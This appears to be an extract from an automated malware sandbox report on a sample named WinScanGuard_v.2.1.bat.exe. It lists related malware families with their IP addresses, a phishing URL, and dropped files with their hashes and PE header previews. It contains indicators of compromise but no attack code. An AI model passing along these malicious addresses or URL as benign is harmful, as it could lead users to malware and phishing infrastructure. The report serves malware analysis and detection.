                                                                          Plyshaar.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 64.225.91.73
                                                                          SecuriteInfo.com.Win32.PWSX-gen.16993.11761.exeGet hashmaliciousLokibotBrowse
                                                                          • 178.128.238.137
                                                                          SecuriteInfo.com.Win32.PWSX-gen.1907.2567.exeGet hashmaliciousLokibotBrowse
                                                                          • 178.128.238.137
                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                          • 165.227.156.49
                                                                          DocScan 105811-26.exeGet hashmaliciousFormBookBrowse
                                                                          • 64.225.91.73
                                                                          m2jngcTeBu.elfGet hashmaliciousMiraiBrowse
                                                                          • 162.243.214.175
                                                                          DocScan 814-1125-2023.exeGet hashmaliciousFormBookBrowse
                                                                          • 64.225.91.73
                                                                          https://login.logggiondocuumennnt.click/?username=cew@smrw.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 188.166.83.143
                                                                          tHRIRkYRbE.elfGet hashmaliciousMiraiBrowse
                                                                          • 138.68.169.154
                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                          • 67.205.189.1
                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                          • 142.93.169.197
                                                                          http://192.241.199.70Get hashmaliciousUnknownBrowse
                                                                          • 192.241.199.70
                                                                          file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                          • 165.22.196.27
                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                          • 68.183.34.12
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeShadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                                            trafik_yenilme.batGet hashmaliciousRemcos, zgRATBrowse
                                                                              a.batGet hashmaliciousAgniane Stealer, zgRATBrowse
                                                                                Rune_Launcher.batGet hashmaliciousQuasarBrowse
                                                                                  SCO_23.batGet hashmaliciouszgRATBrowse
                                                                                    IMG_690B23.docx.batGet hashmaliciousAgentTeslaBrowse
                                                                                      Qtagiietkyb.png.batGet hashmaliciousStrela StealerBrowse
                                                                                        IMG_690B23.batGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                          SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exeGet hashmaliciousUnknownBrowse
                                                                                            SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exeGet hashmaliciousUnknownBrowse
                                                                                              345d.cmdGet hashmaliciousUnknownBrowse
                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                    PingOptimizerMain.batGet hashmaliciousQuasarBrowse
                                                                                                      crack.batGet hashmaliciousUnknownBrowse
                                                                                                        da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.batGet hashmaliciousQuasarBrowse
                                                                                                          Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                            RE_432-7784.jsGet hashmaliciousUnknownBrowse
                                                                                                              FA150623.pdf.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                Uni.batGet hashmaliciousUnknownBrowse
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.6168607357178283
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:lrF4Aypwfs9stDaQ1yDf/QXIDcQzc6CmcE1cw3Cm505t+H4ZAX/d5FMT2SlPkpXY:BHUz900NXfnxzuiFBZ24IO84M
                                                                                                                  MD5:47399C62990857B59A574365850D9353
                                                                                                                  SHA1:00652450030722B18B43FB2DC2A4D3793DD3C6C5
                                                                                                                  SHA-256:F441C52CCFA9D357D4EE0E3F45BBA432CB71E7BA94220ECB56FDF5A9E6C4933A
                                                                                                                  SHA-512:399CB29B124FBADE0547278F78E878BF7157405CA70398162E73C2F37EB078DAEF897327FC5BC3D54A855884E6A4AB7EAD4FE534CFE5F14A0AEDD637C9923B20
                                                                                                                  Malicious:false
                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.6.0.9.2.5.2.6.0.3.2.6.0.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.6.0.9.2.5.2.6.4.8.5.7.3.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.2.3.6.9.e.b.-.1.0.4.2.-.4.5.6.4.-.b.5.2.e.-.6.b.a.a.1.0.f.f.6.9.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.2.5.c.8.3.8.-.4.c.4.6.-.4.0.d.9.-.a.3.b.f.-.8.c.5.0.f.1.7.9.0.3.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.d.l.l.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.d.l.l.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.c.-.0.0.0.1.-.0.0.1.4.-.a.f.3.6.-.4.d.2.1.0.1.2.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.9.7.b.8.c.e.2.3.8.d.b.6.4.4.b.7.e.1.a.1.6.b.4.1.7.d.b.b.5.b.c.0.5.2.a.2.6.8.
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Sun Dec 3 15:55:26 2023, 0x1205a4 type
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20544
                                                                                                                  Entropy (8bit):2.1176116743448796
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:5tw8irfE3h6Ud2qWivzwQH48GQ+DXrnXPM5hrN6rlcl7jWI/WIJDOwM:bziVbvQon/ej6rlclRCwM
                                                                                                                  MD5:C45E43A45BEEFF12A59E6DB9FF61D52E
                                                                                                                  SHA1:6C4EE78029C862D142F80160C3FDA28BAA5ACB6E
                                                                                                                  SHA-256:A6EDCF7C739C2F89BD82A2726AD1D3A7ED714A42FC05E0FF8D66F0B4FC5F99FE
                                                                                                                  SHA-512:61514AB0ABFF60916F1131F1FAE6FB787299BC78D62F80248523C224816A018232B06FB1681FBFF0590E34B3235557DACE05F21952FBDCCDD40B240E632B848A
                                                                                                                  Malicious:false
                                                                                                                  Preview:MDMP..a..... ........le............4........... ...<.......d...............T.......8...........T...........(....J..........\...........H...............................................................................eJ..............GenuineIntel............T............le.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8320
                                                                                                                  Entropy (8bit):3.697334964140081
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:R6l7wVeJyQ6zE6Y8nSUrgmfjPJSWOrpx089bxasf0Bbm:R6lXJt6w6YsSUrgmfjPJSWOVx5fJ
                                                                                                                  MD5:8121C2753ACDF8E43727E1286DFF2E39
                                                                                                                  SHA1:2C0C43B2115FE79926C154AE187DE0D978A2ECE7
                                                                                                                  SHA-256:B5BAACD7DD04EF443DF6B5F22DBF0F6F8E978E35B611D9311914544FA5665EDC
                                                                                                                  SHA-512:BB97355BEB5017D4B4AD96D75E3EB71E61687E19A1DD2E538B17FB811BF9B5F3C2018C52EC6361B4ACB95DDC55AA490F9C66A669BF4134E42428D608829FE1E5
                                                                                                                  Malicious:false
                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.3.2.<./.P.i.
                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4649
                                                                                                                  Entropy (8bit):4.443870618806782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:cvIwWl8zspJg77aI9lSWpW8VYDYm8M4JsLFl+q8+y5ILHBQqCd:uIjf7I73z7VnJscKdlCd
                                                                                                                  MD5:F4F1D1901D4BC05CD07C183361A26759
                                                                                                                  SHA1:4AEA5A072F80B2D59BC34CB57E726478951F988A
                                                                                                                  SHA-256:45504EA8DD2A72B07EE4E3F72DA8B19CEDC6F50EEA125FAA34375A1745265670
                                                                                                                  SHA-512:C9DA81750A5E576AA0AADE6CAFBB04D72CD0306A31740F5FE45B0F704604651F0739F271A082C78A15C815CCDF85F3592BFC5F0F2E3A3DF80BC72434BBF39571
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="88258" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3603
                                                                                                                  Entropy (8bit):5.364531743127414
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHNYrKaq7mSRIzQ09wmj0qD:iqbYqGcQtpDxqKkWqmq1ftzHuLqdIzQk
                                                                                                                  MD5:CB025951AB11BC9879660B66AB48A871
                                                                                                                  SHA1:539153A3469E5EA91A5700944F0CC3547C32AE21
                                                                                                                  SHA-256:057D8F2026B51CBB81516E9A8DDE433D4AEBE1FF6E22D1CB60A742E1EA899367
                                                                                                                  SHA-512:E7095F21D3765FBC7E5F4E97C2CC37A8E56802D5AE7CAE1276BE62E096AF1B06B8B31B83CF7B475D6BE3D82186772B95ADB45A68A84AD060EDCCA3154B4CE6F9
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):11608
                                                                                                                  Entropy (8bit):4.887486353364779
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:I9sm73YrKkDp5hVsm5eml89smFp5IiMDOmEN3H+OHgFqxoeRM3YrKkDVsm5emlpj:HPYmiQ0HzAFItib4Mib4WVoGIpN6KQkT
                                                                                                                  MD5:69E9F3FAAEAC92E92B26596DBA884D3B
                                                                                                                  SHA1:02A87F2EAD0B9DC6202372D370B4D58D025B7CB2
                                                                                                                  SHA-256:F2453CFAB4FB2EB61E0E4DD4BAF35E926BE43E0C8E36569A3A325E605316B321
                                                                                                                  SHA-512:BD0EEF728D260D0BD217B507DC217BB96FA0C069FA872E6D5C8805B922ED81D9F0528AC1EE775F0BC1B1BB666FCE7B170385E5AE229A55D0D4FFF2AC936524FF
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE..........z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-.l..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.............z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:NlllulPiCllp:NllUaml
                                                                                                                  MD5:23CD0F32487D4C39C45260019751EE98
                                                                                                                  SHA1:6AD7B5337078F75823A72D2AE378815F12D2BDDE
                                                                                                                  SHA-256:B1C6D3B064C65143F28727AC3FF69A42CD9844C70407E599832C5008D6A1C576
                                                                                                                  SHA-512:33B63EBADB890E640FE07095F8C5976BF5CDF84D5197787DE585C718CDA3208A48B046A3BCE2039F6AEFCF3900E7F172E124543AD4EC835E5BD900FDAAE4EB91
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...................................'............@..........
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\$sxr-powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\$sxr-powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\$sxr-powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\$sxr-powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):452608
                                                                                                                  Entropy (8bit):5.459268466661775
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                                  MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                                  SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                                  SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: Shadow-Stealer.bat, Detection: malicious, Browse
                                                                                                                  • Filename: trafik_yenilme.bat, Detection: malicious, Browse
                                                                                                                  • Filename: a.bat, Detection: malicious, Browse
                                                                                                                  • Filename: Rune_Launcher.bat, Detection: malicious, Browse
                                                                                                                  • Filename: SCO_23.bat, Detection: malicious, Browse
                                                                                                                  • Filename: IMG_690B23.docx.bat, Detection: malicious, Browse
                                                                                                                  • Filename: Qtagiietkyb.png.bat, Detection: malicious, Browse
                                                                                                                  • Filename: IMG_690B23.bat, Detection: malicious, Browse
                                                                                                                  • Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious, Browse
                                                                                                                  • Filename: SecuriteInfo.com.Win64.DropperX-gen.31402.22171.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 345d.cmd, Detection: malicious, Browse
                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                  • Filename: PingOptimizerMain.bat, Detection: malicious, Browse
                                                                                                                  • Filename: crack.bat, Detection: malicious, Browse
                                                                                                                  • Filename: da49aae4ea90792e9f5497dcd2c4fa8cf7bb98a23b2d846ab985facf.bat, Detection: malicious, Browse
                                                                                                                  • Filename: Final_rooming_list.bat, Detection: malicious, Browse
                                                                                                                  • Filename: RE_432-7784.js, Detection: malicious, Browse
                                                                                                                  • Filename: FA150623.pdf.bat, Detection: malicious, Browse
                                                                                                                  • Filename: Uni.bat, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289792
                                                                                                                  Entropy (8bit):6.135598950357573
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                                  MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                                  SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                                  SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14848
                                                                                                                  Entropy (8bit):4.477514759495553
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Mp2bLg8CB95kCfjmRXKbpkSprJ6AdgxYsPvWw5aIR:MpMLgdrkCjm9KZJAXWw5
                                                                                                                  MD5:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                  SHA1:51C97EBE601EF079B16BCD87AF827B0BE5283D96
                                                                                                                  SHA-256:DBA3137811C686FD35E418D76184070E031F207002649DA95385DFD05A8BB895
                                                                                                                  SHA-512:D9DF8C1F093EA0F7BDE9C356349B2BA43E3CA04B4C87C0F33AB89DDA5AFE9966313A09B60720AA22A1A25D43D7C71A060AF93FB8F6488201A0E301C83FA18045
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}xT[9.:.9.:.9.:.0a..=.:.-r9.;.:.-r>.(.:.9.;...:.-r;.:.:.-r?.:.:.-r2.:.:.-r..8.:.-r8.8.:.Rich9.:.........PE..d.....c..........."............................@....................................r'....`.................................................d'..P....P.......@...............p.. ....$..T............................ ..............(!..p............................text............................... ..`.rdata..4.... ......................@..@.data........0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc.. ....p.......8..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):452608
                                                                                                                  Entropy (8bit):5.459268466661775
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
